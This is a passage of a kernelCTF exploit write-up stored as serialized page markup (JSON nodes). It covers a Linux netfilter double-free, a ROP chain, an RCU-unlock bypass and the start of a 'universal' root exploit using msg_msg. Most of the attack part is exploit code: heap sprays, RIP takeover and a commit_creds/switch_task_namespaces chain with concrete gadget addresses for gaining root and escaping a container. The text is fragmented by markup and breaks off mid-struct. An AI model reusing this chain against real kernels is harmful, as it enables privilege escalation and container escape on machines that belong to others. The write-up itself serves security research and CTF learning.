ROP",{"type":27,"tag":207,"props":63712,"children":63713},{"style":1325},[63714],{"type":33,"value":63526},{"type":27,"tag":207,"props":63716,"children":63717},{"class":209,"line":5530},[63718],{"type":27,"tag":207,"props":63719,"children":63720},{"style":1325},[63721],{"type":33,"value":63722}," deludata_spray(nl, 3, 1);\n",{"type":27,"tag":207,"props":63724,"children":63725},{"class":209,"line":7900},[63726],{"type":27,"tag":207,"props":63727,"children":63728},{"style":1325},[63729],{"type":33,"value":63534},{"type":27,"tag":207,"props":63731,"children":63732},{"class":209,"line":7909},[63733],{"type":27,"tag":207,"props":63734,"children":63735},{"style":1325},[63736],{"type":33,"value":63737}," udata_spray(nl, 0xe8, 4, 1, fake_obj);\n",{"type":27,"tag":207,"props":63739,"children":63740},{"class":209,"line":7917},[63741],{"type":27,"tag":207,"props":63742,"children":63743},{"emptyLinePlaceholder":19},[63744],{"type":33,"value":2062},{"type":27,"tag":207,"props":63746,"children":63747},{"class":209,"line":7926},[63748],{"type":27,"tag":207,"props":63749,"children":63750},{"style":1325},[63751],{"type":33,"value":63752}," // Takeover RIP\n",{"type":27,"tag":207,"props":63754,"children":63755},{"class":209,"line":7934},[63756,63760,63764,63768,63772,63777,63782],{"type":27,"tag":207,"props":63757,"children":63758},{"style":1325},[63759],{"type":33,"value":63688},{"type":27,"tag":207,"props":63761,"children":63762},{"style":238},[63763],{"type":33,"value":11019},{"type":27,"tag":207,"props":63765,"children":63766},{"style":226},[63767],{"type":33,"value":9286},{"type":27,"tag":207,"props":63769,"children":63770},{"style":238},[63771],{"type":33,"value":15942},{"type":27,"tag":207,"props":63773,"children":63774},{"style":8920},[63775],{"type":33,"value":63776},"Takeover",{"type":27,"tag":207,"props":63778,"children":63779},{"style":8920},[63780],{"type":33,"value":63781}," RIP",{"type":27,"tag":207,"props":63783,"children":63784},{"style":1325},[63785],{"type":33,"value":63526},{"type":27,"tag":207,"props":63787,"children":63788},{"class":209,"line":7943},[63789,63794,63798,63803],{"type":27,"tag":207,"props":63790,"children":63791},{"style":1325},[63792],{"type":33,"value":63793}," dump_obj(nl, \"",{"type":27,"tag":207,"props":63795,"children":63796},{"style":214},[63797],{"type":33,"value":63516},{"type":27,"tag":207,"props":63799,"children":63800},{"style":238},[63801],{"type":33,"value":63802},"-1",{"type":27,"tag":207,"props":63804,"children":63805},{"style":1325},[63806],{"type":33,"value":63526},{"type":27,"tag":207,"props":63808,"children":63809},{"class":209,"line":7952},[63810],{"type":27,"tag":207,"props":63811,"children":63812},{"style":1325},[63813],{"type":33,"value":17595},{"type":27,"tag":58,"props":63815,"children":63817},{"id":63816},"bypass-context-switch-in-rcu-critical-section",[63818],{"type":33,"value":63819},"Bypass context switch in RCU critical-section",{"type":27,"tag":36,"props":63821,"children":63822},{},[63823,63824,63829],{"type":33,"value":23888},{"type":27,"tag":84,"props":63825,"children":63827},{"className":63826},[],[63828],{"type":33,"value":62349},{"type":33,"value":63830}," operations are invoked from an RCU critical-section, which can be a problem for ROPing since we want to switch contexts to userland after executing our payload, which is illegal in RCU critical-sections.",{"type":27,"tag":36,"props":63832,"children":63833},{},[63834,63836,63843,63845,63851,63853,63859],{"type":33,"value":63835},"A workaround has been discussed before by D3v17 in a ",{"type":27,"tag":47,"props":63837,"children":63840},{"href":63838,"rel":63839},"https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/exploit.md#post-rip",[51],[63841],{"type":33,"value":63842},"previous kernelCTF submission",{"type":33,"value":63844}," that basically consists in using memory write gadgets to overwrite the RCU lock in our ",{"type":27,"tag":84,"props":63846,"children":63848},{"className":63847},[],[63849],{"type":33,"value":63850},"task_struct",{"type":33,"value":63852}," before switching to userland. Although this works, I struggled to find useful gadgets but ended up coming up with an easier solution. There are kernel APIs specifically meant for acquiring/releasing the RCU lock, so we should be able to simply call ",{"type":27,"tag":84,"props":63854,"children":63856},{"className":63855},[],[63857],{"type":33,"value":63858},"__rcu_read_unlock()",{"type":33,"value":63860}," function and exit the RCU critical-section before switching contexts.",{"type":27,"tag":101,"props":63862,"children":63864},{"className":8877,"code":63863,"language":8876,"meta":7,"style":7}," // ROP stage 1\n int pos = 3;\n\n rop[pos++] = kaslr_slide + __RCU_READ_UNLOCK;\n",[63865],{"type":27,"tag":84,"props":63866,"children":63867},{"__ignoreMap":7},[63868,63876,63900,63907],{"type":27,"tag":207,"props":63869,"children":63870},{"class":209,"line":210},[63871],{"type":27,"tag":207,"props":63872,"children":63873},{"style":4647},[63874],{"type":33,"value":63875}," // ROP stage 1\n",{"type":27,"tag":207,"props":63877,"children":63878},{"class":209,"line":244},[63879,63883,63888,63892,63896],{"type":27,"tag":207,"props":63880,"children":63881},{"style":214},[63882],{"type":33,"value":26347},{"type":27,"tag":207,"props":63884,"children":63885},{"style":238},[63886],{"type":33,"value":63887}," pos ",{"type":27,"tag":207,"props":63889,"children":63890},{"style":226},[63891],{"type":33,"value":10380},{"type":27,"tag":207,"props":63893,"children":63894},{"style":232},[63895],{"type":33,"value":26369},{"type":27,"tag":207,"props":63897,"children":63898},{"style":238},[63899],{"type":33,"value":241},{"type":27,"tag":207,"props":63901,"children":63902},{"class":209,"line":270},[63903],{"type":27,"tag":207,"props":63904,"children":63905},{"emptyLinePlaceholder":19},[63906],{"type":33,"value":2062},{"type":27,"tag":207,"props":63908,"children":63909},{"class":209,"line":296},[63910,63914,63919,63923,63927,63931,63935,63939],{"type":27,"tag":207,"props":63911,"children":63912},{"style":220},[63913],{"type":33,"value":63404},{"type":27,"tag":207,"props":63915,"children":63916},{"style":238},[63917],{"type":33,"value":63918},"[pos",{"type":27,"tag":207,"props":63920,"children":63921},{"style":226},[63922],{"type":33,"value":4713},{"type":27,"tag":207,"props":63924,"children":63925},{"style":238},[63926],{"type":33,"value":15942},{"type":27,"tag":207,"props":63928,"children":63929},{"style":226},[63930],{"type":33,"value":10380},{"type":27,"tag":207,"props":63932,"children":63933},{"style":238},[63934],{"type":33,"value":63425},{"type":27,"tag":207,"props":63936,"children":63937},{"style":226},[63938],{"type":33,"value":2227},{"type":27,"tag":207,"props":63940,"children":63941},{"style":238},[63942],{"type":33,"value":63943}," __RCU_READ_UNLOCK;\n",{"type":27,"tag":58,"props":63945,"children":63947},{"id":63946},"rop",[63948],{"type":33,"value":63604},{"type":27,"tag":36,"props":63950,"children":63951},{},[63952],{"type":33,"value":63953},"Most of the ROP chain to escape the container as root is business as usual:",{"type":27,"tag":1228,"props":63955,"children":63956},{},[63957,63968,63979],{"type":27,"tag":1232,"props":63958,"children":63959},{},[63960,63966],{"type":27,"tag":84,"props":63961,"children":63963},{"className":63962},[],[63964],{"type":33,"value":63965},"commit_creds(&init_cred);",{"type":33,"value":63967}," Commit root credentials to our process",{"type":27,"tag":1232,"props":63969,"children":63970},{},[63971,63977],{"type":27,"tag":84,"props":63972,"children":63974},{"className":63973},[],[63975],{"type":33,"value":63976},"task = find_task_by_vpid(1);",{"type":33,"value":63978}," Find the root process of our namespace",{"type":27,"tag":1232,"props":63980,"children":63981},{},[63982,63988],{"type":27,"tag":84,"props":63983,"children":63985},{"className":63984},[],[63986],{"type":33,"value":63987},"switch_task_namespaces(task, &init_nsproxy);",{"type":33,"value":63989}," Move it to the root namespace",{"type":27,"tag":36,"props":63991,"children":63992},{},[63993,63995,64001,64003,64009,64011,64017,64019,64025,64027,64032,64034,64040],{"type":33,"value":63994},"However, I had a hard time finding gadgets to easily move the return value of ",{"type":27,"tag":84,"props":63996,"children":63998},{"className":63997},[],[63999],{"type":33,"value":64000},"find_task_by_vpid(1)",{"type":33,"value":64002}," passed through ",{"type":27,"tag":84,"props":64004,"children":64006},{"className":64005},[],[64007],{"type":33,"value":64008},"rax",{"type":33,"value":64010}," to ",{"type":27,"tag":84,"props":64012,"children":64014},{"className":64013},[],[64015],{"type":33,"value":64016},"rdi",{"type":33,"value":64018},". What I ended up going with was a ",{"type":27,"tag":84,"props":64020,"children":64022},{"className":64021},[],[64023],{"type":33,"value":64024},"push rax; jmp qword ptr [rsi + 0x66]; ret",{"type":33,"value":64026}," gadget, that allowed me to push the ",{"type":27,"tag":84,"props":64028,"children":64030},{"className":64029},[],[64031],{"type":33,"value":64008},{"type":33,"value":64033}," value onto the stack and then jump to a controlled location, where I stored a ",{"type":27,"tag":84,"props":64035,"children":64037},{"className":64036},[],[64038],{"type":33,"value":64039},"pop rdi; ret",{"type":33,"value":64041}," gadget to consume the new stack value and restore normal ROP execution. This very minor detour in the ROP flow looks like this:",{"type":27,"tag":1228,"props":64043,"children":64044},{},[64045,64050,64063],{"type":27,"tag":1232,"props":64046,"children":64047},{},[64048],{"type":33,"value":64049},"We push the value onto the stack (stack pointer regresses)",{"type":27,"tag":1232,"props":64051,"children":64052},{},[64053,64055,64061],{"type":33,"value":64054},"We jump to our \"trampoline\" gadget (",{"type":27,"tag":84,"props":64056,"children":64058},{"className":64057},[],[64059],{"type":33,"value":64060},"pop rdi; ret;",{"type":33,"value":64062}," location)",{"type":27,"tag":1232,"props":64064,"children":64065},{},[64066,64071],{"type":27,"tag":84,"props":64067,"children":64069},{"className":64068},[],[64070],{"type":33,"value":64039},{"type":33,"value":64072}," consumes the value from the stack (progressing the stack pointer back to where it should be), and then we bounce back to the next gadget",{"type":27,"tag":101,"props":64074,"children":64076},{"className":8877,"code":64075,"language":8876,"meta":7,"style":7},"[...]\n // commit_creds(&init_cred);\n rop[pos++] = kaslr_slide + 0xffffffff8112c7c0; // pop rdi; ret;\n rop[pos++] = kaslr_slide + INIT_CRED;\n rop[pos++] = kaslr_slide + COMMIT_CREDS;\n\n // task = find_task_by_vpid(1);\n rop[pos++] = kaslr_slide + 0xffffffff8112c7c0; // pop rdi; ret;\n rop[pos++] = 1;\n rop[pos++] = kaslr_slide + FIND_TASK_BY_VPID;\n rop[pos++] = kaslr_slide + 0xffffffff8102e2a6; // pop rsi; ret;\n rop[pos++] = obj_ptr + 0xe0 - 0x66; // rax -> rdi and resume rop\n rop[pos++] = kaslr_slide + 0xffffffff81caed31; // push rax; jmp qword ptr [rsi + 0x66];\n\n // switch_task_namespaces(task, &init_nsproxy);\n rop[pos++] = kaslr_slide + 0xffffffff8102e2a6; // pop rsi; ret;\n rop[pos++] = kaslr_slide + INIT_NSPROXY;\n rop[pos++] = kaslr_slide + SWITCH_TASK_NAMESPACES;\n[...]\n",[64077],{"type":27,"tag":84,"props":64078,"children":64079},{"__ignoreMap":7},[64080,64087,64104,64149,64185,64221,64228,64236,64279,64310,64346,64391,64446,64491,64498,64506,64549,64585,64621],{"type":27,"tag":207,"props":64081,"children":64082},{"class":209,"line":210},[64083],{"type":27,"tag":207,"props":64084,"children":64085},{"style":238},[64086],{"type":33,"value":17595},{"type":27,"tag":207,"props":64088,"children":64089},{"class":209,"line":244},[64090,64095,64100],{"type":27,"tag":207,"props":64091,"children":64092},{"style":238},[64093],{"type":33,"value":64094}," // commit_creds(&",{"type":27,"tag":207,"props":64096,"children":64097},{"style":220},[64098],{"type":33,"value":64099},"init_cred",{"type":27,"tag":207,"props":64101,"children":64102},{"style":238},[64103],{"type":33,"value":1455},{"type":27,"tag":207,"props":64105,"children":64106},{"class":209,"line":270},[64107,64111,64115,64119,64123,64127,64131,64135,64140,64144],{"type":27,"tag":207,"props":64108,"children":64109},{"style":220},[64110],{"type":33,"value":63404},{"type":27,"tag":207,"props":64112,"children":64113},{"style":238},[64114],{"type":33,"value":63918},{"type":27,"tag":207,"props":64116,"children":64117},{"style":226},[64118],{"type":33,"value":4713},{"type":27,"tag":207,"props":64120,"children":64121},{"style":238},[64122],{"type":33,"value":15942},{"type":27,"tag":207,"props":64124,"children":64125},{"style":226},[64126],{"type":33,"value":10380},{"type":27,"tag":207,"props":64128,"children":64129},{"style":238},[64130],{"type":33,"value":63425},{"type":27,"tag":207,"props":64132,"children":64133},{"style":226},[64134],{"type":33,"value":2227},{"type":27,"tag":207,"props":64136,"children":64137},{"style":232},[64138],{"type":33,"value":64139}," 0xffffffff8112c7c0",{"type":27,"tag":207,"props":64141,"children":64142},{"style":238},[64143],{"type":33,"value":56312},{"type":27,"tag":207,"props":64145,"children":64146},{"style":4647},[64147],{"type":33,"value":64148}," // pop rdi; ret;\n",{"type":27,"tag":207,"props":64150,"children":64151},{"class":209,"line":296},[64152,64156,64160,64164,64168,64172,64176,64180],{"type":27,"tag":207,"props":64153,"children":64154},{"style":220},[64155],{"type":33,"value":63404},{"type":27,"tag":207,"props":64157,"children":64158},{"style":238},[64159],{"type":33,"value":63918},{"type":27,"tag":207,"props":64161,"children":64162},{"style":226},[64163],{"type":33,"value":4713},{"type":27,"tag":207,"props":64165,"children":64166},{"style":238},[64167],{"type":33,"value":15942},{"type":27,"tag":207,"props":64169,"children":64170},{"style":226},[64171],{"type":33,"value":10380},{"type":27,"tag":207,"props":64173,"children":64174},{"style":238},[64175],{"type":33,"value":63425},{"type":27,"tag":207,"props":64177,"children":64178},{"style":226},[64179],{"type":33,"value":2227},{"type":27,"tag":207,"props":64181,"children":64182},{"style":238},[64183],{"type":33,"value":64184}," INIT_CRED;\n",{"type":27,"tag":207,"props":64186,"children":64187},{"class":209,"line":445},[64188,64192,64196,64200,64204,64208,64212,64216],{"type":27,"tag":207,"props":64189,"children":64190},{"style":220},[64191],{"type":33,"value":63404},{"type":27,"tag":207,"props":64193,"children":64194},{"style":238},[64195],{"type":33,"value":63918},{"type":27,"tag":207,"props":64197,"children":64198},{"style":226},[64199],{"type":33,"value":4713},{"type":27,"tag":207,"props":64201,"children":64202},{"style":238},[64203],{"type":33,"value":15942},{"type":27,"tag":207,"props":64205,"children":64206},{"style":226},[64207],{"type":33,"value":10380},{"type":27,"tag":207,"props":64209,"children":64210},{"style":238},[64211],{"type":33,"value":63425},{"type":27,"tag":207,"props":64213,"children":64214},{"style":226},[64215],{"type":33,"value":2227},{"type":27,"tag":207,"props":64217,"children":64218},{"style":238},[64219],{"type":33,"value":64220}," COMMIT_CREDS;\n",{"type":27,"tag":207,"props":64222,"children":64223},{"class":209,"line":867},[64224],{"type":27,"tag":207,"props":64225,"children":64226},{"emptyLinePlaceholder":19},[64227],{"type":33,"value":2062},{"type":27,"tag":207,"props":64229,"children":64230},{"class":209,"line":892},[64231],{"type":27,"tag":207,"props":64232,"children":64233},{"style":4647},[64234],{"type":33,"value":64235}," // task = find_task_by_vpid(1);\n",{"type":27,"tag":207,"props":64237,"children":64238},{"class":209,"line":1475},[64239,64243,64247,64251,64255,64259,64263,64267,64271,64275],{"type":27,"tag":207,"props":64240,"children":64241},{"style":220},[64242],{"type":33,"value":63404},{"type":27,"tag":207,"props":64244,"children":64245},{"style":238},[64246],{"type":33,"value":63918},{"type":27,"tag":207,"props":64248,"children":64249},{"style":226},[64250],{"type":33,"value":4713},{"type":27,"tag":207,"props":64252,"children":64253},{"style":238},[64254],{"type":33,"value":15942},{"type":27,"tag":207,"props":64256,"children":64257},{"style":226},[64258],{"type":33,"value":10380},{"type":27,"tag":207,"props":64260,"children":64261},{"style":238},[64262],{"type":33,"value":63425},{"type":27,"tag":207,"props":64264,"children":64265},{"style":226},[64266],{"type":33,"value":2227},{"type":27,"tag":207,"props":64268,"children":64269},{"style":232},[64270],{"type":33,"value":64139},{"type":27,"tag":207,"props":64272,"children":64273},{"style":238},[64274],{"type":33,"value":56312},{"type":27,"tag":207,"props":64276,"children":64277},{"style":4647},[64278],{"type":33,"value":64148},{"type":27,"tag":207,"props":64280,"children":64281},{"class":209,"line":2065},[64282,64286,64290,64294,64298,64302,64306],{"type":27,"tag":207,"props":64283,"children":64284},{"style":220},[64285],{"type":33,"value":63404},{"type":27,"tag":207,"props":64287,"children":64288},{"style":238},[64289],{"type":33,"value":63918},{"type":27,"tag":207,"props":64291,"children":64292},{"style":226},[64293],{"type":33,"value":4713},{"type":27,"tag":207,"props":64295,"children":64296},{"style":238},[64297],{"type":33,"value":15942},{"type":27,"tag":207,"props":64299,"children":64300},{"style":226},[64301],{"type":33,"value":10380},{"type":27,"tag":207,"props":64303,"children":64304},{"style":232},[64305],{"type":33,"value":235},{"type":27,"tag":207,"props":64307,"children":64308},{"style":238},[64309],{"type":33,"value":241},{"type":27,"tag":207,"props":64311,"children":64312},{"class":209,"line":2092},[64313,64317,64321,64325,64329,64333,64337,64341],{"type":27,"tag":207,"props":64314,"children":64315},{"style":220},[64316],{"type":33,"value":63404},{"type":27,"tag":207,"props":64318,"children":64319},{"style":238},[64320],{"type":33,"value":63918},{"type":27,"tag":207,"props":64322,"children":64323},{"style":226},[64324],{"type":33,"value":4713},{"type":27,"tag":207,"props":64326,"children":64327},{"style":238},[64328],{"type":33,"value":15942},{"type":27,"tag":207,"props":64330,"children":64331},{"style":226},[64332],{"type":33,"value":10380},{"type":27,"tag":207,"props":64334,"children":64335},{"style":238},[64336],{"type":33,"value":63425},{"type":27,"tag":207,"props":64338,"children":64339},{"style":226},[64340],{"type":33,"value":2227},{"type":27,"tag":207,"props":64342,"children":64343},{"style":238},[64344],{"type":33,"value":64345}," FIND_TASK_BY_VPID;\n",{"type":27,"tag":207,"props":64347,"children":64348},{"class":209,"line":2130},[64349,64353,64357,64361,64365,64369,64373,64377,64382,64386],{"type":27,"tag":207,"props":64350,"children":64351},{"style":220},[64352],{"type":33,"value":63404},{"type":27,"tag":207,"props":64354,"children":64355},{"style":238},[64356],{"type":33,"value":63918},{"type":27,"tag":207,"props":64358,"children":64359},{"style":226},[64360],{"type":33,"value":4713},{"type":27,"tag":207,"props":64362,"children":64363},{"style":238},[64364],{"type":33,"value":15942},{"type":27,"tag":207,"props":64366,"children":64367},{"style":226},[64368],{"type":33,"value":10380},{"type":27,"tag":207,"props":64370,"children":64371},{"style":238},[64372],{"type":33,"value":63425},{"type":27,"tag":207,"props":64374,"children":64375},{"style":226},[64376],{"type":33,"value":2227},{"type":27,"tag":207,"props":64378,"children":64379},{"style":232},[64380],{"type":33,"value":64381}," 0xffffffff8102e2a6",{"type":27,"tag":207,"props":64383,"children":64384},{"style":238},[64385],{"type":33,"value":56312},{"type":27,"tag":207,"props":64387,"children":64388},{"style":4647},[64389],{"type":33,"value":64390}," // pop rsi; ret;\n",{"type":27,"tag":207,"props":64392,"children":64393},{"class":209,"line":2168},[64394,64398,64402,64406,64410,64414,64419,64423,64428,64432,64437,64441],{"type":27,"tag":207,"props":64395,"children":64396},{"style":220},[64397],{"type":33,"value":63404},{"type":27,"tag":207,"props":64399,"children":64400},{"style":238},[64401],{"type":33,"value":63918},{"type":27,"tag":207,"props":64403,"children":64404},{"style":226},[64405],{"type":33,"value":4713},{"type":27,"tag":207,"props":64407,"children":64408},{"style":238},[64409],{"type":33,"value":15942},{"type":27,"tag":207,"props":64411,"children":64412},{"style":226},[64413],{"type":33,"value":10380},{"type":27,"tag":207,"props":64415,"children":64416},{"style":238},[64417],{"type":33,"value":64418}," obj_ptr ",{"type":27,"tag":207,"props":64420,"children":64421},{"style":226},[64422],{"type":33,"value":2227},{"type":27,"tag":207,"props":64424,"children":64425},{"style":232},[64426],{"type":33,"value":64427}," 0xe0",{"type":27,"tag":207,"props":64429,"children":64430},{"style":226},[64431],{"type":33,"value":544},{"type":27,"tag":207,"props":64433,"children":64434},{"style":232},[64435],{"type":33,"value":64436}," 0x66",{"type":27,"tag":207,"props":64438,"children":64439},{"style":238},[64440],{"type":33,"value":56312},{"type":27,"tag":207,"props":64442,"children":64443},{"style":4647},[64444],{"type":33,"value":64445}," // rax -> rdi and resume rop\n",{"type":27,"tag":207,"props":64447,"children":64448},{"class":209,"line":4095},[64449,64453,64457,64461,64465,64469,64473,64477,64482,64486],{"type":27,"tag":207,"props":64450,"children":64451},{"style":220},[64452],{"type":33,"value":63404},{"type":27,"tag":207,"props":64454,"children":64455},{"style":238},[64456],{"type":33,"value":63918},{"type":27,"tag":207,"props":64458,"children":64459},{"style":226},[64460],{"type":33,"value":4713},{"type":27,"tag":207,"props":64462,"children":64463},{"style":238},[64464],{"type":33,"value":15942},{"type":27,"tag":207,"props":64466,"children":64467},{"style":226},[64468],{"type":33,"value":10380},{"type":27,"tag":207,"props":64470,"children":64471},{"style":238},[64472],{"type":33,"value":63425},{"type":27,"tag":207,"props":64474,"children":64475},{"style":226},[64476],{"type":33,"value":2227},{"type":27,"tag":207,"props":64478,"children":64479},{"style":232},[64480],{"type":33,"value":64481}," 0xffffffff81caed31",{"type":27,"tag":207,"props":64483,"children":64484},{"style":238},[64485],{"type":33,"value":56312},{"type":27,"tag":207,"props":64487,"children":64488},{"style":4647},[64489],{"type":33,"value":64490}," // push rax; jmp qword ptr [rsi + 0x66];\n",{"type":27,"tag":207,"props":64492,"children":64493},{"class":209,"line":4103},[64494],{"type":27,"tag":207,"props":64495,"children":64496},{"emptyLinePlaceholder":19},[64497],{"type":33,"value":2062},{"type":27,"tag":207,"props":64499,"children":64500},{"class":209,"line":4154},[64501],{"type":27,"tag":207,"props":64502,"children":64503},{"style":4647},[64504],{"type":33,"value":64505}," // switch_task_namespaces(task, &init_nsproxy);\n",{"type":27,"tag":207,"props":64507,"children":64508},{"class":209,"line":4203},[64509,64513,64517,64521,64525,64529,64533,64537,64541,64545],{"type":27,"tag":207,"props":64510,"children":64511},{"style":220},[64512],{"type":33,"value":63404},{"type":27,"tag":207,"props":64514,"children":64515},{"style":238},[64516],{"type":33,"value":63918},{"type":27,"tag":207,"props":64518,"children":64519},{"style":226},[64520],{"type":33,"value":4713},{"type":27,"tag":207,"props":64522,"children":64523},{"style":238},[64524],{"type":33,"value":15942},{"type":27,"tag":207,"props":64526,"children":64527},{"style":226},[64528],{"type":33,"value":10380},{"type":27,"tag":207,"props":64530,"children":64531},{"style":238},[64532],{"type":33,"value":63425},{"type":27,"tag":207,"props":64534,"children":64535},{"style":226},[64536],{"type":33,"value":2227},{"type":27,"tag":207,"props":64538,"children":64539},{"style":232},[64540],{"type":33,"value":64381},{"type":27,"tag":207,"props":64542,"children":64543},{"style":238},[64544],{"type":33,"value":56312},{"type":27,"tag":207,"props":64546,"children":64547},{"style":4647},[64548],{"type":33,"value":64390},{"type":27,"tag":207,"props":64550,"children":64551},{"class":209,"line":4249},[64552,64556,64560,64564,64568,64572,64576,64580],{"type":27,"tag":207,"props":64553,"children":64554},{"style":220},[64555],{"type":33,"value":63404},{"type":27,"tag":207,"props":64557,"children":64558},{"style":238},[64559],{"type":33,"value":63918},{"type":27,"tag":207,"props":64561,"children":64562},{"style":226},[64563],{"type":33,"value":4713},{"type":27,"tag":207,"props":64565,"children":64566},{"style":238},[64567],{"type":33,"value":15942},{"type":27,"tag":207,"props":64569,"children":64570},{"style":226},[64571],{"type":33,"value":10380},{"type":27,"tag":207,"props":64573,"children":64574},{"style":238},[64575],{"type":33,"value":63425},{"type":27,"tag":207,"props":64577,"children":64578},{"style":226},[64579],{"type":33,"value":2227},{"type":27,"tag":207,"props":64581,"children":64582},{"style":238},[64583],{"type":33,"value":64584}," INIT_NSPROXY;\n",{"type":27,"tag":207,"props":64586,"children":64587},{"class":209,"line":4290},[64588,64592,64596,64600,64604,64608,64612,64616],{"type":27,"tag":207,"props":64589,"children":64590},{"style":220},[64591],{"type":33,"value":63404},{"type":27,"tag":207,"props":64593,"children":64594},{"style":238},[64595],{"type":33,"value":63918},{"type":27,"tag":207,"props":64597,"children":64598},{"style":226},[64599],{"type":33,"value":4713},{"type":27,"tag":207,"props":64601,"children":64602},{"style":238},[64603],{"type":33,"value":15942},{"type":27,"tag":207,"props":64605,"children":64606},{"style":226},[64607],{"type":33,"value":10380},{"type":27,"tag":207,"props":64609,"children":64610},{"style":238},[64611],{"type":33,"value":63425},{"type":27,"tag":207,"props":64613,"children":64614},{"style":226},[64615],{"type":33,"value":2227},{"type":27,"tag":207,"props":64617,"children":64618},{"style":238},[64619],{"type":33,"value":64620}," SWITCH_TASK_NAMESPACES;\n",{"type":27,"tag":207,"props":64622,"children":64623},{"class":209,"line":4304},[64624],{"type":27,"tag":207,"props":64625,"children":64626},{"style":238},[64627],{"type":33,"value":17595},{"type":27,"tag":58,"props":64629,"children":64631},{"id":64630},"grabbing-the-kernelctf-flag",[64632],{"type":33,"value":64633},"Grabbing the kernelCTF flag",{"type":27,"tag":36,"props":64635,"children":64636},{},[64637,64641,64643,64650],{"type":27,"tag":126,"props":64638,"children":64640},{"alt":57817,"src":64639},"/posts/netfilter-universal-root-1-day/flag.png",[],{"type":33,"value":64642},"\nYou can find the kernelCTF exploit in our ",{"type":27,"tag":47,"props":64644,"children":64647},{"href":64645,"rel":64646},"https://github.com/otter-sec/OtterRoot/blob/master/kernelctf/exploit.c",[51],[64648],{"type":33,"value":64649},"GitHub",{"type":33,"value":1041},{"type":27,"tag":28,"props":64652,"children":64654},{"id":64653},"universal-exploit",[64655],{"type":33,"value":64656},"Universal exploit",{"type":27,"tag":36,"props":64658,"children":64659},{},[64660],{"type":33,"value":64661},"After exploiting KernelCTF, I decided to use this vulnerability to craft a universal exploit (one that works stably regardless of the target without needing to be modified). I took a different approach to avoid some compatibility and reliability pitfalls, the biggest ones being ROP and anything else that relies on kernel data offsets because those change from build to build. It's not uncommon to compile a list of gadgets for the different builds but it makes more sense just to avoid the trouble entirely.",{"type":27,"tag":58,"props":64663,"children":64665},{"id":64664},"pivot-capability-using-msg_msg-mlistnext-pointer",[64666],{"type":33,"value":64667},"Pivot capability using msg_msg->mlist.next pointer",{"type":27,"tag":36,"props":64669,"children":64670},{},[64671,64673,64679,64681,64686,64688,64694],{"type":33,"value":64672},"Using the double-free vulnerability we can overlap a ",{"type":27,"tag":84,"props":64674,"children":64676},{"className":64675},[],[64677],{"type":33,"value":64678},"msg_msg",{"type":33,"value":64680}," object with with ",{"type":27,"tag":84,"props":64682,"children":64684},{"className":64683},[],[64685],{"type":33,"value":62334},{"type":33,"value":64687}," and control the ",{"type":27,"tag":84,"props":64689,"children":64691},{"className":64690},[],[64692],{"type":33,"value":64693},"m_list.next",{"type":33,"value":64695}," pointer.",{"type":27,"tag":101,"props":64697,"children":64699},{"className":8877,"code":64698,"language":8876,"meta":7,"style":7},"/* one msg_msg structure for each message */\nstruct msg_msg {\n struct list_head m_list;\n long m_type;\n size_t m_ts; /* message text size */\n struct msg_msgseg *next;\n void *security;\n /* the actual message follows immediately */\n};\n[...]\nstruct list_head {\n struct list_head *next, *prev;\n};\n",[64700],{"type":27,"tag":84,"props":64701,"children":64702},{"__ignoreMap":7},[64703,64711,64727,64748,64761,64779,64803,64819,64827,64834,64841,64849,64881],{"type":27,"tag":207,"props":64704,"children":64705},{"class":209,"line":210},[64706],{"type":27,"tag":207,"props":64707,"children":64708},{"style":4647},[64709],{"type":33,"value":64710},"/* one msg_msg structure for each message */\n",{"type":27,"tag":207,"props":64712,"children":64713},{"class":209,"line":244},[64714,64718,64723],{"type":27,"tag":207,"props":64715,"children":64716},{"style":214},[64717],{"type":33,"value":16677},{"type":27,"tag":207,"props":64719,"children":64720},{"style":8920},[64721],{"type":33,"value":64722}," msg_msg",{"type":27,"tag":207,"props":64724,"children":64725},{"style":238},[64726],{"type":33,"value":384},{"type":27,"tag":207,"props":64728,"children":64729},{"class":209,"line":270},[64730,64734,64739,64744],{"type":27,"tag":207,"props":64731,"children":64732},{"style":214},[64733],{"type":33,"value":28423},{"type":27,"tag":207,"props":64735,"children":64736},{"style":8920},[64737],{"type":33,"value":64738}," list_head",{"type":27,"tag":207,"props":64740,"children":64741},{"style":220},[64742],{"type":33,"value":64743}," m_list",{"type":27,"tag":207,"props":64745,"children":64746},{"style":238},[64747],{"type":33,"value":241},{"type":27,"tag":207,"props":64749,"children":64750},{"class":209,"line":296},[64751,64756],{"type":27,"tag":207,"props":64752,"children":64753},{"style":214},[64754],{"type":33,"value":64755}," long",{"type":27,"tag":207,"props":64757,"children":64758},{"style":238},[64759],{"type":33,"value":64760}," m_type;\n",{"type":27,"tag":207,"props":64762,"children":64763},{"class":209,"line":445},[64764,64769,64774],{"type":27,"tag":207,"props":64765,"children":64766},{"style":214},[64767],{"type":33,"value":64768}," size_t",{"type":27,"tag":207,"props":64770,"children":64771},{"style":238},[64772],{"type":33,"value":64773}," m_ts;",{"type":27,"tag":207,"props":64775,"children":64776},{"style":4647},[64777],{"type":33,"value":64778}," /* message text size */\n",{"type":27,"tag":207,"props":64780,"children":64781},{"class":209,"line":867},[64782,64786,64791,64795,64799],{"type":27,"tag":207,"props":64783,"children":64784},{"style":214},[64785],{"type":33,"value":28423},{"type":27,"tag":207,"props":64787,"children":64788},{"style":8920},[64789],{"type":33,"value":64790}," msg_msgseg",{"type":27,"tag":207,"props":64792,"children":64793},{"style":214},[64794],{"type":33,"value":17093},{"type":27,"tag":207,"props":64796,"children":64797},{"style":220},[64798],{"type":33,"value":4186},{"type":27,"tag":207,"props":64800,"children":64801},{"style":238},[64802],{"type":33,"value":241},{"type":27,"tag":207,"props":64804,"children":64805},{"class":209,"line":892},[64806,64810,64814],{"type":27,"tag":207,"props":64807,"children":64808},{"style":214},[64809],{"type":33,"value":58288},{"type":27,"tag":207,"props":64811,"children":64812},{"style":226},[64813],{"type":33,"value":17093},{"type":27,"tag":207,"props":64815,"children":64816},{"style":238},[64817],{"type":33,"value":64818},"security;\n",{"type":27,"tag":207,"props":64820,"children":64821},{"class":209,"line":1475},[64822],{"type":27,"tag":207,"props":64823,"children":64824},{"style":4647},[64825],{"type":33,"value":64826}," /* the actual message follows immediately 